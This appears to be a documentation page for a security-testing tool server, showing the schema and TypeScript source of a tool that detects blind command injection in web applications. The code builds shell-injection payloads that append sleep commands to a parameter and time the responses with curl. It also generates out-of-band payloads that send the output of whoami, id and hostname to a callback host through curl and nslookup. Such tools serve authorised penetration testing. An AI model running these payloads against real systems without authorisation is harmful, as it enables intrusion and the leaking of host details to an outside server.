cmdi_blind_detect
Detect blind command injection vulnerabilities using time delay analysis and out-of-band callbacks to identify security weaknesses in web applications.
Instructions
Detect blind command injection via time delay and OOB callbacks. Tests sleep-based delay detection and optional out-of-band (curl/nslookup to callback). Returns time_based results array and oob_payloads list. Side effects: Executes sleep on target if vulnerable. OOB payloads call back to callback_url.
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Target URL | |
| parameter | Yes | Vulnerable parameter name | |
| base_value | No | Legitimate parameter value | |
| method | No | HTTP method | |
| callback_url | No | Out-of-band callback URL for OOB detection (e.g. Burp Collaborator) | |
| delay_seconds | No | Sleep duration for time-based detection |
Implementation Reference
- src/tools/cmdi.ts:100-181 (handler)The implementation of the 'cmdi_blind_detect' tool, which performs time-based and OOB command injection detection.
server.tool( "cmdi_blind_detect", "Detect blind command injection via time delay and OOB callbacks. Tests sleep-based delay detection and optional out-of-band (curl/nslookup to callback). Returns time_based results array and oob_payloads list. Side effects: Executes sleep on target if vulnerable. OOB payloads call back to callback_url.", { url: z.string().describe("Target URL"), parameter: z.string().describe("Vulnerable parameter name"), base_value: z.string().optional().describe("Legitimate parameter value"), method: z.enum(["GET", "POST"]).optional().describe("HTTP method"), callback_url: z.string().optional().describe("Out-of-band callback URL for OOB detection (e.g. Burp Collaborator)"), delay_seconds: z.number().min(1).max(10).optional().describe("Sleep duration for time-based detection"), }, async ({ url, parameter, base_value = "1", method = "POST", callback_url, delay_seconds = 5 }) => { requireTool("curl"); const cb = callback_url ?? "https://collaborator.example.com"; // Time-based payloads const sleepPayloads = [ `${base_value};sleep ${delay_seconds}`, `${base_value}&&sleep ${delay_seconds}`, `${base_value}|sleep ${delay_seconds}`, `${base_value}\`sleep ${delay_seconds}\``, `${base_value}$(sleep ${delay_seconds})`, ]; const timeResults = []; for (const payload of sleepPayloads) { let curlArgs: string[]; if (method === "GET") { curlArgs = [ "-sk", "-o", "/dev/null", "-w", "%{time_total}", `${url}?${parameter}=${payload}`, ]; } else { curlArgs = [ "-sk", "-o", "/dev/null", "-w", "%{time_total}", "-X", "POST", "-d", `${parameter}=${payload}`, url, ]; } const res = await runCmd("curl", curlArgs, { timeout: delay_seconds + 15 }); let elapsed = 0.0; try { elapsed = parseFloat(res.stdout); if (isNaN(elapsed)) elapsed = 0.0; } catch { elapsed = 0.0; } const triggered = elapsed >= delay_seconds * 0.8; timeResults.push({ payload, elapsed_seconds: Math.round(elapsed * 100) / 100, triggered, }); } // OOB payloads (generate but don't verify — user checks collaborator) const cbHost = cb.replace("https://", "").replace("http://", ""); const oobPayloads = [ `${base_value};curl ${cb}/$(whoami)`, `${base_value};nslookup $(whoami).${cbHost}`, `${base_value}$(curl ${cb}/$(id))`, `${base_value}\`curl ${cb}/$(hostname)\``, ]; const anyTriggered = timeResults.some((r) => r.triggered); const result = { time_based_vulnerable: anyTriggered, time_results: timeResults, oob_payloads_generated: oobPayloads, hint: callback_url ? "Check your callback server for OOB interactions after sending these payloads manually." : "Set callback_url for out-of-band detection.", }; return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] }; } );